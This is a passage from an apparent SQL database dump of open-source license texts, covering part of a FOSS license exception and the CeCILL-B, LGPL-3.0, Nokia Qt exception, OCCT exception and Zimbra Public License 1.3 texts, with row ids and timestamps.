Notice.\n\n 2. A FOSS application developer (\"you\" or \"your\") may distribute a Derivative Work provided that you and the Derivative Work meet all of the following conditions:\n\n 1. You obey the GPL in all respects for the Program and all portions (including modifications) of the Program included in the Derivative Work (provided that this condition does not apply to Independent Works);\n\n 2. The Derivative Work does not include any work licensed under the GPL other than the Program;\n\n 3. You distribute Independent Works subject to a license listed in the section below titled \"FOSS License List\";\n\n 4. You distribute Independent Works in object code or executable form with the complete corresponding machine-readable source code on the same medium and under the same FOSS license applying to the object code or executable forms;\n\n 5. All works that are aggregated with the Program or the Derivative Work on a medium or volume of storage are not derivative works of the Program, Derivative Work or FOSS Application, and must reasonably be considered independent and separate works.\n\n 3. DigiRule Solutions reserves all rights not expressly granted in these terms and conditions. If all of the above conditions are not met, then this FOSS License Exception does not apply to you or your Derivative Work.\n\nFOSS License List\n\nLicense Name Version(s)/Copyright Date\n\nRelease Early Certified Software\n\nAcademic Free License 2.0\n\nApache Software License 1.0/1.1/2.0\n\nApple Public Source License 2.0\n\nArtistic license From Perl 5.8.0\n\nBSD license \"July 22 1999\"\n\nCommon Development and Distribution License (CDDL) 1.0\n\nCommon Public License 1.0\n\nEclipse Public License 1.0\n\nGNU Library or \"Lesser\" General Public License (LGPL) 2.0/2.1/3.0\n\nJabber Open Source License 1.0\n\nMIT License (As listed in file MIT-License.txt) -\n\nMozilla Public License (MPL) 1.0/1.1\n\nOpen Software License 2.0\n\nOpenSSL license (with original SSLeay license) \"2003\" (\"1998\")\n\nPHP License 3.0/3.01\n\nPython license (CNRI Python License) -\n\nPython Software Foundation License 2.1.1\n\nSleepycat License \"1999\"\n\nUniversity of Illinois/NCSA Open Source License -\n\nW3C License \"2001\"\n\nX11 License \"2001\"\n\nZlib/libpng License -\n\nZope Public License 2.0\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(233,'CECILL-B','CeCILL-B FREE SOFTWARE LICENSE AGREEMENT Notice\n\nThis Agreement is a Free Software license agreement that is the result of\ndiscussions between its authors in order to ensure compliance with the two\nmain principles guiding its drafting:\n\n* firstly, compliance with the principles governing the distribution of Free\nSoftware: access to source code, broad rights granted to users,\n\n* secondly, the election of a governing law, French law, with which it is\nconformant, both as regards the law of torts and intellectual property law,\nand the protection that it offers to both authors and holders of the economic\nrights over software.\n\nThe authors of the CeCILL¹ license are:\n\n \n\nCommissariat à l\'Energie Atomique - CEA, a public scientific, technical and\nindustrial research establishment, having its principal place of business\nat 25 rue Leblanc, immeuble Le Ponant D, 75015 Paris, France.\n\n \n\nCentre National de la Recherche Scientifique - CNRS, a public scientific and\ntechnological establishment, having its principal place of business at 3 rue\nMichel-Ange, 75794 Paris cedex 16, France.\n\n \n\nInstitut National de Recherche en Informatique et en Automatique - INRIA,\na public scientific and technological establishment, having its principal\nplace of business at Domaine de Voluceau, Rocquencourt, BP 105, 78153 Le Chesnay\ncedex, France.\n\nPreamble This Agreement is an open source software license intended to give\nusers significant freedom to modify and redistribute the software licensed\nhereunder.\n\nThe exercising of this freedom is conditional upon a strong obligation of\ngiving credits for everybody that distributes a software incorporating a software\nruled by the current license so as all contributions to be properly identified\nand acknowledged.\n\nIn consideration of access to the source code and the rights to copy, modify\nand redistribute granted by the license, users are provided only with a limited\nwarranty and the software\'s author, the holder of the economic rights, and\nthe successive licensors only have limited liability.\n\nIn this respect, the risks associated with loading, using, modifying and/or\ndeveloping or reproducing the software by the user are brought to the user\'s\nattention, given its Free Software status, which may make it complicated to\nuse, with the result that its use is reserved for developers and experienced\nprofessionals having in-depth computer knowledge. Users are therefore encouraged\nto load and test the suitability of the software as regards their requirements\nin conditions enabling the security of their systems and/or data to be ensured\nand, more generally, to use and operate it in the same conditions of security.\nThis Agreement may be freely reproduced and published, provided it is not\naltered, and that no provisions are either added or removed herefrom.\n\nThis Agreement may apply to any or all software for which the holder of the\neconomic rights decides to submit the use thereof to its provisions.\n\n Article 1 - DEFINITIONS\n\nFor the purpose of this Agreement, when the following expressions commence\nwith a capital letter, they shall have the following meaning:\n\n \n\nAgreement: means this license agreement, and its possible subsequent versions\nand annexes.\n\n \n\nSoftware: means the software in its Object Code and/or Source Code form and,\nwhere applicable, its documentation, \"as is\" when the Licensee accepts the\nAgreement.\n\n \n\nInitial Software: means the Software in its Source Code and possibly its Object\nCode form and, where applicable, its documentation, \"as is\" when it is first\ndistributed under the terms and conditions of the Agreement.\n\n \n\nModified Software: means the Software modified by at least one Contribution.\n\n \n\nSource Code: means all the Software\'s instructions and program lines to which\naccess is required so as to modify the Software.\n\n \n\nObject Code: means the binary files originating from the compilation of the\nSource Code.\n\n \n\nHolder: means the holder(s) of the economic rights over the Initial Software.\n\n \n\n Licensee: means the Software user(s) having accepted the Agreement.\n\n \n\n Contributor: means a Licensee having made at least one Contribution.\n\n \n\nLicensor: means the Holder, or any other individual or legal entity, who distributes\nthe Software under the Agreement.\n\n \n\nContribution: means any or all modifications, corrections, translations, adaptations\nand/or new functions integrated into the Software by any or all Contributors,\nas well as any or all Internal Modules.\n\n \n\nModule: means a set of sources files including their documentation that enables\nsupplementary functions or services in addition to those offered by the Software.\n\n \n\nExternal Module: means any or all Modules, not derived from the Software,\nso that this Module and the Software run in separate address spaces, with\none calling the other when they are run.\n\n \n\nInternal Module: means any or all Module, connected to the Software so that\nthey both execute in the same address space.\n\n \n\n Parties: mean both the Licensee and the Licensor.\n\n These expressions may be used both in singular and plural form.\n\n Article 2 - PURPOSE\n\nThe purpose of the Agreement is the grant by the Licensor to the Licensee\nof a non-exclusive, transferable and worldwide license for the Software as\nset forth in Article 5 hereinafter for the whole term of the protection granted\nby the rights over said Software.\n\n Article 3 - ACCEPTANCE\n\n3.1 The Licensee shall be deemed as having accepted the terms and conditions\nof this Agreement upon the occurrence of the first of the following events:\n\n(i) loading the Software by any or all means, notably, by downloading from\na remote server, or by loading from a physical medium;\n\n(ii) the first time the Licensee exercises any of the rights granted hereunder.\n\n3.2 One copy of the Agreement, containing a notice relating to the characteristics\nof the Software, to the limited warranty, and to the fact that its use is\nrestricted to experienced users has been provided to the Licensee prior to\nits acceptance as set forth in Article 3.1 hereinabove, and the Licensee hereby\nacknowledges that it has read and understood it.\n\n Article 4 - EFFECTIVE DATE AND TERM\n\n 4.1 EFFECTIVE DATE\n\nThe Agreement shall become effective on the date when it is accepted by the\nLicensee as set forth in Article 3.1.\n\n 4.2 TERM\n\nThe Agreement shall remain in force for the entire legal term of protection\nof the economic rights over the Software.\n\n Article 5 - SCOPE OF RIGHTS GRANTED\n\nThe Licensor hereby grants to the Licensee, who accepts, the following rights\nover the Software for any or all use, and for the term of the Agreement, on\nthe basis of the terms and conditions set forth hereinafter.\n\nBesides, if the Licensor owns or comes to own one or more patents protecting\nall or part of the functions of the Software or of its components, the Licensor\nundertakes not to enforce the rights granted by these patents against successive\nLicensees using, exploiting or modifying the Software. If these patents are\ntransferred, the Licensor undertakes to have the transferees subscribe to\nthe obligations set forth in this paragraph.\n\n 5.1 RIGHT OF USE\n\nThe Licensee is authorized to use the Software, without any limitation as\nto its fields of application, with it being hereinafter specified that this\ncomprises:\n\n1. permanent or temporary reproduction of all or part of the Software by any\nor all means and in any or all form.\n\n2. loading, displaying, running, or storing the Software on any or all medium.\n\n3. entitlement to observe, study or test its operation so as to determine\nthe ideas and principles behind any or all constituent elements of said Software.\nThis shall apply when the Licensee carries out any or all loading, displaying,\nrunning, transmission or storage operation as regards the Software, that it\nis entitled to carry out hereunder.\n\n 5.2 ENTITLEMENT TO MAKE CONTRIBUTIONS\n\nThe right to make Contributions includes the right to translate, adapt, arrange,\nor make any or all modifications to the Software, and the right to reproduce\nthe resulting software.\n\nThe Licensee is authorized to make any or all Contributions to the Software\nprovided that it includes an explicit notice that it is the author of said\nContribution and indicates the date of the creation thereof.\n\n 5.3 RIGHT OF DISTRIBUTION\n\nIn particular, the right of distribution includes the right to publish, transmit\nand communicate the Software to the general public on any or all medium, and\nby any or all means, and the right to market, either in consideration of a\nfee, or free of charge, one or more copies of the Software by any means.\n\nThe Licensee is further authorized to distribute copies of the modified or\nunmodified Software to third parties according to the terms and conditions\nset forth hereinafter.\n\n 5.3.1. DISTRIBUTION OF SOFTWARE WITHOUT MODIFICATION\n\nThe Licensee is authorized to distribute true copies of the Software in Source\nCode or Object Code form, provided that said distribution complies with all\nthe provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the Object Code of the Software is redistributed,\nthe Licensee allows effective access to the full Source Code of the Software\nat a minimum during the entire period of its distribution of the Software,\nit being understood that the additional cost of acquiring the Source Code\nshall not exceed the cost of transferring the data.\n\n 5.3.2. DISTRIBUTION OF MODIFIED SOFTWARE\n\nIf the Licensee makes any Contribution to the Software, the resulting Modified\nSoftware may be distributed under a license agreement other than this Agreement\nsubject to compliance with the provisions of Article 5.3.4.\n\n 5.3.3. DISTRIBUTION OF EXTERNAL MODULES\n\nWhen the Licensee has developed an External Module, the terms and conditions\nof this Agreement do not apply to said External Module, that may be distributed\nunder a separate license agreement.\n\n 5.3.4. CREDITS\n\nAny Licensee who may distribute a Modified Software hereby expressly agrees\nto:\n\n1. indicate in the related documentation that it is based on the Software\nlicensed hereunder, and reproduce the intellectual property notice for the\nSoftware,\n\n2. ensure that written indications of the Software intended use, intellectual\nproperty notice and license hereunder are included in easily accessible format\nfrom the Modified Software interface,\n\n3. mention, on a freely accessible website describing the Modified Software,\nat least throughout the distribution term thereof, that it is based on the\nSoftware licensed hereunder, and reproduce the Software intellectual property\nnotice,\n\n4. where it is distributed to a third party that may distribute a Modified\nSoftware without having to make its source code available, make its best efforts\nto ensure that said third party agrees to comply with the obligations set\nforth in this Article .\n\nIf the Software, whether or not modified, is distributed with an External\nModule designed for use in connection with the Software, the Licensee shall\nsubmit said External Module to the foregoing obligations.\n\n 5.3.5. COMPATIBILITY WITH THE CeCILL AND CeCILL-C LICENSES\n\nWhere a Modified Software contains a Contribution subject to the CeCILL license,\nthe provisions set forth in Article 5.3.4 shall be optional.\n\nA Modified Software may be distributed under the CeCILL-C license. In such\na case the provisions set forth in Article 5.3.4 shall be optional.\n\n Article 6 - INTELLECTUAL PROPERTY\n\n 6.1 OVER THE INITIAL SOFTWARE\n\nThe Holder owns the economic rights over the Initial Software. Any or all\nuse of the Initial Software is subject to compliance with the terms and conditions\nunder which the Holder has elected to distribute its work and no one shall\nbe entitled to modify the terms and conditions for the distribution of said\nInitial Software.\n\nThe Holder undertakes that the Initial Software will remain ruled at least\nby this Agreement, for the duration set forth in Article 4.2.\n\n 6.2 OVER THE CONTRIBUTIONS\n\nThe Licensee who develops a Contribution is the owner of the intellectual\nproperty rights over this Contribution as defined by applicable law.\n\n 6.3 OVER THE EXTERNAL MODULES\n\nThe Licensee who develops an External Module is the owner of the intellectual\nproperty rights over this External Module as defined by applicable law and\nis free to choose the type of agreement that shall govern its distribution.\n\n 6.4 JOINT PROVISIONS\n\n The Licensee expressly undertakes:\n\n1. not to remove, or modify, in any manner, the intellectual property notices\nattached to the Software;\n\n2. to reproduce said notices, in an identical manner, in the copies of the\nSoftware modified or not.\n\nThe Licensee undertakes not to directly or indirectly infringe the intellectual\nproperty rights of the Holder and/or Contributors on the Software and to take,\nwhere applicable, vis-à-vis its staff, any and all measures required to ensure\nrespect of said intellectual property rights of the Holder and/or Contributors.\n\n Article 7 - RELATED SERVICES\n\n7.1 Under no circumstances shall the Agreement oblige the Licensor to provide\ntechnical assistance or maintenance services for the Software.\n\nHowever, the Licensor is entitled to offer this type of services. The terms\nand conditions of such technical assistance, and/or such maintenance, shall\nbe set forth in a separate instrument. Only the Licensor offering said maintenance\nand/or technical assistance services shall incur liability therefor.\n\n7.2 Similarly, any Licensor is entitled to offer to its licensees, under its\nsole responsibility, a warranty, that shall only be binding upon itself, for\nthe redistribution of the Software and/or the Modified Software, under terms\nand conditions that it is free to decide. Said warranty, and the financial\nterms and conditions of its application, shall be subject of a separate instrument\nexecuted between the Licensor and the Licensee.\n\n Article 8 - LIABILITY\n\n8.1 Subject to the provisions of Article 8.2, the Licensee shall be entitled\nto claim compensation for any direct loss it may have suffered from the Software\nas a result of a fault on the part of the relevant Licensor, subject to providing\nevidence thereof.\n\n8.2 The Licensor\'s liability is limited to the commitments made under this\nAgreement and shall not be incurred as a result of in particular: (i) loss\ndue the Licensee\'s total or partial failure to fulfill its obligations, (ii)\ndirect or consequential loss that is suffered by the Licensee due to the use\nor performance of the Software, and (iii) more generally, any consequential\nloss. In particular the Parties expressly agree that any or all pecuniary\nor business loss (i.e. loss of data, loss of profits, operating loss, loss\nof customers or orders, opportunity cost, any disturbance to business activities)\nor any or all legal proceedings instituted against the Licensee by a third\nparty, shall constitute consequential loss and shall not provide entitlement\nto any or all compensation from the Licensor.\n\n Article 9 - WARRANTY\n\n9.1 The Licensee acknowledges that the scientific and technical state-of-the-art\nwhen the Software was distributed did not enable all possible uses to be tested\nand verified, nor for the presence of possible defects to be detected. In\nthis respect, the Licensee\'s attention has been drawn to the risks associated\nwith loading, using, modifying and/or developing and reproducing the Software\nwhich are reserved for experienced users.\n\nThe Licensee shall be responsible for verifying, by any or all means, the\nsuitability of the product for its requirements, its good working order, and\nfor ensuring that it shall not cause damage to either persons or properties.\n\n9.2 The Licensor hereby represents, in good faith, that it is entitled to\ngrant all the rights over the Software (including in particular the rights\nset forth in Article 5).\n\n9.3 The Licensee acknowledges that the Software is supplied \"as is\" by the\nLicensor without any other express or tacit warranty, other than that provided\nfor in Article 9.2 and, in particular, without any warranty as to its commercial\nvalue, its secured, safe, innovative or relevant nature.\n\nSpecifically, the Licensor does not warrant that the Software is free from\nany error, that it will operate without interruption, that it will be compatible\nwith the Licensee\'s own equipment and software configuration, nor that it\nwill meet the Licensee\'s requirements.\n\n9.4 The Licensor does not either expressly or tacitly warrant that the Software\ndoes not infringe any third party intellectual property right relating to\na patent, software or any other property right. Therefore, the Licensor disclaims\nany and all liability towards the Licensee arising out of any or all proceedings\nfor infringement that may be instituted in respect of the use, modification\nand redistribution of the Software. Nevertheless, should such proceedings\nbe instituted against the Licensee, the Licensor shall provide it with technical\nand legal assistance for its defense. Such technical and legal assistance\nshall be decided on a case-by-case basis between the relevant Licensor and\nthe Licensee pursuant to a memorandum of understanding. The Licensor disclaims\nany and all liability as regards the Licensee\'s use of the name of the Software.\nNo warranty is given as regards the existence of prior rights over the name\nof the Software or as regards the existence of a trademark.\n\n Article 10 - TERMINATION\n\n10.1 In the event of a breach by the Licensee of its obligations hereunder,\nthe Licensor may automatically terminate this Agreement thirty (30) days after\nnotice has been sent to the Licensee and has remained ineffective.\n\n10.2 A Licensee whose Agreement is terminated shall no longer be authorized\nto use, modify or distribute the Software. However, any licenses that it may\nhave granted prior to termination of the Agreement shall remain valid subject\nto their having been granted in compliance with the terms and conditions hereof.\n\n Article 11 - MISCELLANEOUS\n\n 11.1 EXCUSABLE EVENTS\n\nNeither Party shall be liable for any or all delay, or failure to perform\nthe Agreement, that may be attributable to an event of force majeure, an act\nof God or an outside cause, such as defective functioning or interruptions\nof the electricity or telecommunications networks, network paralysis following\na virus attack, intervention by government authorities, natural disasters,\nwater damage, earthquakes, fire, explosions, strikes and labor unrest, war,\netc.\n\n11.2 Any failure by either Party, on one or more occasions, to invoke one\nor more of the provisions hereof, shall under no circumstances be interpreted\nas being a waiver by the interested Party of its right to invoke said provision(s)\nsubsequently.\n\n11.3 The Agreement cancels and replaces any or all previous agreements, whether\nwritten or oral, between the Parties and having the same purpose, and constitutes\nthe entirety of the agreement between said Parties concerning said purpose.\nNo supplement or modification to the terms and conditions hereof shall be\neffective as between the Parties unless it is made in writing and signed by\ntheir duly authorized representatives.\n\n11.4 In the event that one or more of the provisions hereof were to conflict\nwith a current or future applicable act or legislative text, said act or legislative\ntext shall prevail, and the Parties shall make the necessary amendments so\nas to comply with said act or legislative text. All other provisions shall\nremain effective. Similarly, invalidity of a provision of the Agreement, for\nany reason whatsoever, shall not cause the Agreement as a whole to be invalid.\n\n 11.5 LANGUAGE\n\nThe Agreement is drafted in both French and English and both versions are\ndeemed authentic.\n\n Article 12 - NEW VERSIONS OF THE AGREEMENT\n\n12.1 Any person is authorized to duplicate and distribute copies of this Agreement.\n\n12.2 So as to ensure coherence, the wording of this Agreement is protected\nand may only be modified by the authors of the License, who reserve the right\nto periodically publish updates or new versions of the Agreement, each with\na separate number. These subsequent versions may address new issues encountered\nby Free Software.\n\n12.3 Any Software distributed under a given version of the Agreement may only\nbe subsequently distributed under the same version of the Agreement or a subsequent\nversion.\n\n Article 13 - GOVERNING LAW AND JURISDICTION\n\n13.1 The Agreement is governed by French law. The Parties agree to endeavor\nto seek an amicable solution to any disagreements or disputes that may arise\nduring the performance of the Agreement.\n\n13.2 Failing an amicable solution within two (2) months as from their occurrence,\nand unless emergency proceedings are necessary, the disagreements or disputes\nshall be referred to the Paris Courts having jurisdiction, by the more diligent\nParty.\n\nVersion 1.0 dated 2006-09-05. 1 CeCILL stands for Ce(a) C(nrs) I(nria) L(ogiciel)\nL(ibre)\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(234,'LGPL-3.0-only','GNU LESSER GENERAL PUBLIC LICENSE\n\nVersion 3, 29 June 2007\n\nCopyright (C) 2007 Free Software Foundation, Inc. <http s ://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nThis version of the GNU Lesser General Public License incorporates the terms\nand conditions of version 3 of the GNU General Public License, supplemented\nby the additional permissions listed below.\n\n 0. Additional Definitions.\n\n \n\nAs used herein, \"this License\" refers to version 3 of the GNU Lesser General\nPublic License, and the \"GNU GPL\" refers to version 3 of the GNU General Public\nLicense.\n\n \n\n\"The Library\" refers to a covered work governed by this License, other than\nan Application or a Combined Work as defined below.\n\n \n\nAn \"Application\" is any work that makes use of an interface provided by the\nLibrary, but which is not otherwise based on the Library. Defining a subclass\nof a class defined by the Library is deemed a mode of using an interface provided\nby the Library.\n\n \n\nA \"Combined Work\" is a work produced by combining or linking an Application\nwith the Library. The particular version of the Library with which the Combined\nWork was made is also called the \"Linked Version\".\n\n \n\nThe \"Minimal Corresponding Source\" for a Combined Work means the Corresponding\nSource for the Combined Work, excluding any source code for portions of the\nCombined Work that, considered in isolation, are based on the Application,\nand not on the Linked Version.\n\n \n\nThe \"Corresponding Application Code\" for a Combined Work means the object\ncode and/or source code for the Application, including any data and utility\nprograms needed for reproducing the Combined Work from the Application, but\nexcluding the System Libraries of the Combined Work.\n\n 1. Exception to Section 3 of the GNU GPL.\n\nYou may convey a covered work under sections 3 and 4 of this License without\nbeing bound by section 3 of the GNU GPL.\n\n 2. Conveying Modified Versions.\n\nIf you modify a copy of the Library, and, in your modifications, a facility\nrefers to a function or data to be supplied by an Application that uses the\nfacility (other than as an argument passed when the facility is invoked),\nthen you may convey a copy of the modified version:\n\na) under this License, provided that you make a good faith effort to ensure\nthat, in the event an Application does not supply the function or data, the\nfacility still operates, and performs whatever part of its purpose remains\nmeaningful, or\n\nb) under the GNU GPL, with none of the additional permissions of this License\napplicable to that copy.\n\n 3. Object Code Incorporating Material from Library Header Files.\n\nThe object code form of an Application may incorporate material from a header\nfile that is part of the Library. You may convey such object code under terms\nof your choice, provided that, if the incorporated material is not limited\nto numerical parameters, data structure layouts and accessors, or small macros,\ninline functions and templates (ten or fewer lines in length), you do both\nof the following:\n\na) Give prominent notice with each copy of the object code that the Library\nis used in it and that the Library and its use are covered by this License.\n\nb) Accompany the object code with a copy of the GNU GPL and this license document.\n\n 4. Combined Works.\n\nYou may convey a Combined Work under terms of your choice that, taken together,\neffectively do not restrict modification of the portions of the Library contained\nin the Combined Work and reverse engineering for debugging such modifications,\nif you also do each of the following:\n\na) Give prominent notice with each copy of the Combined Work that the Library\nis used in it and that the Library and its use are covered by this License.\n\nb) Accompany the Combined Work with a copy of the GNU GPL and this license\ndocument.\n\nc) For a Combined Work that displays copyright notices during execution, include\nthe copyright notice for the Library among these notices, as well as a reference\ndirecting the user to the copies of the GNU GPL and this license document.\n\n d) Do one of the following:\n\n0) Convey the Minimal Corresponding Source under the terms of this License,\nand the Corresponding Application Code in a form suitable for, and under terms\nthat permit, the user to recombine or relink the Application with a modified\nversion of the Linked Version to produce a modified Combined Work, in the\nmanner specified by section 6 of the GNU GPL for conveying Corresponding Source.\n\n1) Use a suitable shared library mechanism for linking with the Library. A\nsuitable mechanism is one that (a) uses at run time a copy of the Library\nalready present on the user\'s computer system, and (b) will operate properly\nwith a modified version of the Library that is interface-compatible with the\nLinked Version.\n\ne) Provide Installation Information, but only if you would otherwise be required\nto provide such information under section 6 of the GNU GPL, and only to the\nextent that such information is necessary to install and execute a modified\nversion of the Combined Work produced by recombining or relinking the Application\nwith a modified version of the Linked Version. (If you use option 4d0, the\nInstallation Information must accompany the Minimal Corresponding Source and\nCorresponding Application Code. If you use option 4d1, you must provide the\nInstallation Information in the manner specified by section 6 of the GNU GPL\nfor conveying Corresponding Source.)\n\n 5. Combined Libraries.\n\nYou may place library facilities that are a work based on the Library side\nby side in a single library together with other library facilities that are\nnot Applications and are not covered by this License, and convey such a combined\nlibrary under terms of your choice, if you do both of the following:\n\na) Accompany the combined library with a copy of the same work based on the\nLibrary, uncombined with any other library facilities, conveyed under the\nterms of this License.\n\nb) Give prominent notice with the combined library that part of it is a work\nbased on the Library, and explaining where to find the accompanying uncombined\nform of the same work.\n\n 6. Revised Versions of the GNU Lesser General Public License.\n\nThe Free Software Foundation may publish revised and/or new versions of the\nGNU Lesser General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Library as you\nreceived it specifies that a certain numbered version of the GNU Lesser General\nPublic License \"or any later version\" applies to it, you have the option of\nfollowing the terms and conditions either of that published version or of\nany later version published by the Free Software Foundation. If the Library\nas you received it does not specify a version number of the GNU Lesser General\nPublic License, you may choose any version of the GNU Lesser General Public\nLicense ever published by the Free Software Foundation.\n\nIf the Library as you received it specifies that a proxy can decide whether\nfuture versions of the GNU Lesser General Public License shall apply, that\nproxy\'s public statement of acceptance of any version is permanent authorization\nfor you to choose that version for the Library.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(235,'Nokia-Qt-exception-1.1','Nokia Qt LGPL Exception version 1.1\n\nAs an additional permission to the GNU Lesser General Public License version 2.1, the object code form of a \"work that uses the Library\" may incorporate material from a header file that is part of the Library. You may distribute such object code under terms of your choice, provided that:\n\n (i) the header files of the Library have not been modified; and\n\n (ii) the incorporated material is limited to numerical parameters, data structure layouts, accessors, macros, inline functions and templates; and\n\n (iii) you comply with the terms of Section 6 of the GNU Lesser General Public License version 2.1.\n\nMoreover, you may apply this exception to a modified version of the Library, provided that such modification does not involve copying material from the Library into the modified Library\'s header files unless such material is limited to\n\n (i) numerical parameters;\n\n (ii) data structure layouts;\n\n (iii) accessors; and\n\n (iv) small macros, templates and inline functions of five lines or less in length.\n\nFurthermore, you are not required to apply this additional permission to a modified version of the Library.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(236,'OCCT-exception-1.0','Open CASCADE Exception (version 1.0) to GNU LGPL version 2.1.\n\nThe object code (i.e. not a source) form of a \"work that uses the Library\" can incorporate material from a header file that is part of the Library. As a special exception to the GNU Lesser General Public License version 2.1, you may distribute such object code incorporating material from header files provided with the Open CASCADE Technology libraries (including code of CDL generic classes) under terms of your choice, provided that you give prominent notice in supporting documentation to this code that it makes use of or is based on facilities provided by the Open CASCADE Technology software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(237,'Zimbra-1.3','Zimbra Public License, Version 1.3 (ZPL)\n\nThis Zimbra Public License (this \"Agreement\") is a legal agreement that describes\nthe terms under which VMware, Inc., a Delaware corporation having its principal\nplace of business at 3401 Hillview Avenue, Palo Alto, California 94304 (\"VMware\")\nwill provide software to you via download or otherwise (\"Software\"). By using\nthe Software, you, an individual or an entity (\"You\") agree to the terms of\nthis Agreement.\n\nIn consideration of the mutual promises and upon the terms and conditions\nset forth below, the parties agree as follows:\n\n 1. Grant of Copyright License\n\n1.1 - Subject to the terms and conditions of this Agreement, VMware hereby\ngrants to You, under any and all of its copyright interest in and to the Software,\na royalty-free, non-exclusive, non-transferable license to copy, modify, compile,\nexecute, and distribute the Software and Modifications. For the purposes of\nthis Agreement, any change to, addition to, or abridgement of the Software\nmade by You is a \"Modification;\" however, any file You add to the Software\nthat does not contain any part of the Software is not a \"Modification.\"\n\n1.2 - If You are an individual acting on behalf of a corporation or other\nentity, Your use of the Software or any Modification is subject to Your having\nthe authority to bind such corporation or entity to this Agreement. Providing\ncopies to persons within such corporation or entity is not considered distribution\nfor purposes of this Agreement.\n\n1.3 - For the Software or any Modification You distribute in source code format,\nYou must do so only under the terms of this Agreement, and You must include\na complete copy of this Agreement with Your distribution. With respect to\nany Modification You distribute in source code format, the terms of this Agreement\nwill apply to You in the same way those terms apply to VMware with respect\nto the Software. In other words, when You are distributing Modifications under\nthis Agreement, You \"stand in the shoes\" of VMware in terms of the rights\nYou grant and how the terms and conditions apply to You and the licensees\nof Your Modifications. Notwithstanding the foregoing, when You \"stand in the\nshoes\" of VMware, You are not subject to the jurisdiction provision under\nSection 7, which requires all disputes under this Agreement to be subject\nto the jurisdiction of federal or state courts of northern California.\n\n1.4 - For the Software or any Modification You distribute in compiled or object\ncode format, You must also provide recipients with access to the Software\nor Modification in source code format along with a complete copy of this Agreement.\nThe distribution of the Software or Modifications in compiled or object code\nformat may be under a license of Your choice, provided that You are in compliance\nwith the terms of this Agreement. In addition, You must make absolutely clear\nthat any license terms applying to such Software or Modification that differ\nfrom this Agreement are offered by You alone and not by VMware, and that such\nlicense does not restrict recipients from exercising rights in the source\ncode to the Software granted by VMware under this Agreement or rights in the\nsource code to any Modification granted by You as described in Section 1.3.\n\n1.5 - This Agreement does not limit Your right to distribute files that are\nentirely Your own work (i.e., which do not incorporate any portion of the\nSoftware and are not Modifications) under any terms You choose.\n\n 2. Support\n\nVMware has no obligation to provide technical support or updates to You. Nothing\nin this Agreement requires VMware to enter into any license with You for any\nother edition of the Software.\n\n 3. Intellectual Property Rights\n\n3.1 - Except for the license expressly granted under copyright in Section\n1.1, no rights, licenses or forbearances are granted or may arise in relation\nto this Agreement whether expressly, by implication, exhaustion, estoppel\nor otherwise. All rights, including all intellectual property rights, that\nare not expressly granted under this Agreement are hereby reserved.\n\n3.2 - In any copy of the Software or in any Modification you create, You must\nretain and reproduce, any and all copyright, patent, trademark, and attribution\nnotices that are included in the Software in the same form as they appear\nin the Software. This includes the preservation of attribution notices in\nthe form of trademarks or logos that exist within a user interface of the\nSoftware.\n\n3.3 - This license does not grant You rights to use any party\'s name, logo,\nor trademarks, except solely as necessary to comply with Section 3.2.\n\n 4. Disclaimer of Warranties\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY OF ANY KIND. VMWARE\nMAKES NO WARRANTIES, WHETHER EXPRESS, IMPLIED, OR STATUTORY REGARDING OR RELATING\nTO THE SOFTWARE. SPECIFICALLY, VMWARE DOES NOT WARRANT THAT THE SOFTWARE WILL\nBE ERROR FREE OR WILL PERFORM IN AN UNINTERRUPTED MANNER. TO THE GREATEST\nEXTENT ALLOWED BY LAW, VMWARE SPECIFICALLY DISCLAIMS ALL IMPLIED WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE (EVEN IF VMWARE HAD BEEN\nINFORMED OF SUCH PURPOSE), AND NONINFRINGEMENT WITH RESPECT TO THE SOFTWARE,\nANY MODIFICATIONS THERETO AND WITH RESPECT TO THE USE OF THE FOREGOING.\n\n 5. Limitation of Liability\n\nIN NO EVENT WILL VMWARE BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES OF ANY KIND (INCLUDING WITHOUT LIMITATION\nLOSS OF PROFITS, LOSS OF USE, BUSINESS INTERRUPTION, LOSS OF DATA, COST OF\nCOVER) IN CONNECTION WITH OR ARISING OUT OF OR RELATING TO THE FURNISHING,\nPERFORMANCE OR USE OF THE SOFTWARE OR ANY OTHER RIGHTS GRANTED HEREUNDER,\nWHETHER ALLEGED AS A BREACH OF CONTRACT OR TORTIOUS CONDUCT, INCLUDING NEGLIGENCE,\nAND EVEN IF VMWARE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 6. Term and Termination\n\n6.1 - This Agreement will continue in effect unless and until terminated earlier\npursuant to this Section 6.\n\n6.2 - In the event You violate the terms of this Agreement, VMware may terminate\nthis Agreement.\n\n6.3 - All licenses granted hereunder shall terminate upon the termination\nof this Agreement. Termination will be in addition to any rights and remedies\navailable to VMware at law or equity or under this Agreement.\n\n6.4 - Termination of this Agreement will not affect the provisions regarding\nreservation of rights (Section 3.1), provisions disclaiming or limiting VMware\'s\nliability (Sections 4 and 5), Termination (Section 6) or Miscellaneous (Section\n7), which provisions will survive termination of this Agreement.\n\n 7. Miscellaneous\n\nThis Agreement contains the entire agreement of the parties with respect to\nthe subject matter of this Agreement and supersedes all previous communications,\nrepresentations, understandings and agreements, either oral or written, between\nthe parties with respect to said subject matter. The relationship of the parties\nhereunder is that of independent contractors, and this Agreement will not\nbe construed as creating an agency, partnership, joint venture or any other\nform of legal association between the parties. If any term, condition, or\nprovision in this Agreement is found to be invalid, unlawful or unenforceable\nto any extent, this Agreement will be construed in a manner that most closely\neffectuates the intent of this Agreement. Such invalid term, condition or\nprovision will be severed from the remaining terms, conditions and provisions,\nwhich will continue to be valid and enforceable to the fullest extent permitted\nby law. This Agreement will be interpreted and construed in 